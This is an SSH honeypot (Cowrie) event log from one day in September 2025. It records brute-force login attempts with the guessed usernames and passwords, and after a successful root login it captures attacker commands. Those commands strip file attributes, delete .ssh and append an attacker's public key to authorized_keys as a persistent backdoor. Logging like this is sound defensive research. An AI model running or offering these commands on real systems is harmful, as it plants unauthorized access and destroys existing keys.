{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:26.894834Z","src_ip":"212.227.235.229","session":"84172f1dffb5"}
{"eventid":"cowrie.login.failed","username":"test2","password":"2025","message":"login attempt [test2/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:27.599669Z","src_ip":"212.227.235.229","session":"84172f1dffb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56084,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b576883520","protocol":"ssh","message":"New connection: 212.227.235.229:56084 (1.2.3.4:22) [session: 58b576883520]","sensor":"my-vps","timestamp":"2025-09-08T12:56:27.702789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:27.703560Z","src_ip":"212.227.235.229","session":"58b576883520"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:27.996227Z","src_ip":"212.227.235.229","session":"58b576883520"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:28.775070Z","src_ip":"212.227.235.229","session":"84172f1dffb5"}
{"eventid":"cowrie.login.failed","username":"boris","password":"boris.123","message":"login attempt [boris/boris.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:29.206308Z","src_ip":"212.227.235.229","session":"58b576883520"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:30.500767Z","src_ip":"212.227.235.229","session":"58b576883520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47984,"dst_ip":"1.2.3.4","dst_port":22,"session":"b25f2c8f0cd0","protocol":"ssh","message":"New connection: 212.227.235.229:47984 (1.2.3.4:22) [session: b25f2c8f0cd0]","sensor":"my-vps","timestamp":"2025-09-08T12:56:31.945406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:31.946094Z","src_ip":"212.227.235.229","session":"b25f2c8f0cd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:32.206311Z","src_ip":"212.227.235.229","session":"b25f2c8f0cd0"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssw0rd","message":"login attempt [deploy/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:33.283615Z","src_ip":"212.227.235.229","session":"b25f2c8f0cd0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:34.546270Z","src_ip":"212.227.235.229","session":"b25f2c8f0cd0"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38538,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6c04a899276","protocol":"ssh","message":"New connection: 134.199.174.250:38538 (1.2.3.4:22) [session: d6c04a899276]","sensor":"my-vps","timestamp":"2025-09-08T12:56:40.740446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:56:40.803218Z","src_ip":"134.199.174.250","session":"d6c04a899276"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:56:41.036185Z","src_ip":"134.199.174.250","session":"d6c04a899276"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwerty123","message":"login attempt [admin/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:42.298623Z","src_ip":"134.199.174.250","session":"d6c04a899276"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:43.694827Z","src_ip":"134.199.174.250","session":"d6c04a899276"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":45834,"dst_ip":"1.2.3.4","dst_port":22,"session":"87365cbe7691","protocol":"ssh","message":"New connection: 134.199.174.250:45834 (1.2.3.4:22) [session: 87365cbe7691]","sensor":"my-vps","timestamp":"2025-09-08T12:57:10.697662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:57:10.699224Z","src_ip":"134.199.174.250","session":"87365cbe7691"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:57:11.159173Z","src_ip":"134.199.174.250","session":"87365cbe7691"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r","message":"login attempt [admin/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:12.386480Z","src_ip":"134.199.174.250","session":"87365cbe7691"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:13.686453Z","src_ip":"134.199.174.250","session":"87365cbe7691"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57588,"dst_ip":"1.2.3.4","dst_port":22,"session":"09080d84e08f","protocol":"ssh","message":"New connection: 212.227.235.229:57588 (1.2.3.4:22) [session: 09080d84e08f]","sensor":"my-vps","timestamp":"2025-09-08T12:57:16.690524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:16.691497Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:16.822420Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.login.success","username":"root","password":"p0o9i8u7","message":"login attempt [root/p0o9i8u7] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:57:17.387131Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:57:17.666264Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:57:17.667039Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:57:17.668070Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:17.801013Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:57:18.150625Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:57:18.151342Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:57:18.284894Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:18.285749Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58270,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fbc143393cb","protocol":"ssh","message":"New connection: 212.227.235.229:58270 (1.2.3.4:22) [session: 1fbc143393cb]","sensor":"my-vps","timestamp":"2025-09-08T12:57:18.413027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:18.413949Z","src_ip":"212.227.235.229","session":"1fbc143393cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:18.543425Z","src_ip":"212.227.235.229","session":"1fbc143393cb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:19.104490Z","src_ip":"212.227.235.229","session":"1fbc143393cb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:20.236630Z","src_ip":"212.227.235.229","session":"1fbc143393cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58984,"dst_ip":"1.2.3.4","dst_port":22,"session":"5255e1372420","protocol":"ssh","message":"New connection: 212.227.235.229:58984 (1.2.3.4:22) [session: 5255e1372420]","sensor":"my-vps","timestamp":"2025-09-08T12:57:20.365573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:20.366398Z","src_ip":"212.227.235.229","session":"5255e1372420"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:20.496307Z","src_ip":"212.227.235.229","session":"5255e1372420"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:57:21.058378Z","src_ip":"212.227.235.229","session":"5255e1372420"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:21.189557Z","src_ip":"212.227.235.229","session":"5255e1372420"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:21.190596Z","src_ip":"212.227.235.229","session":"09080d84e08f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47770,"dst_ip":"1.2.3.4","dst_port":22,"session":"88185e74ffd5","protocol":"ssh","message":"New connection: 212.227.235.229:47770 (1.2.3.4:22) [session: 88185e74ffd5]","sensor":"my-vps","timestamp":"2025-09-08T12:57:24.534550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:24.535415Z","src_ip":"212.227.235.229","session":"88185e74ffd5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:24.829933Z","src_ip":"212.227.235.229","session":"88185e74ffd5"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password","message":"login attempt [odoo/password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:26.038840Z","src_ip":"212.227.235.229","session":"88185e74ffd5"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":56542,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b397139091d","protocol":"ssh","message":"New connection: 139.59.14.27:56542 (1.2.3.4:22) [session: 0b397139091d]","sensor":"my-vps","timestamp":"2025-09-08T12:57:27.045785Z"}
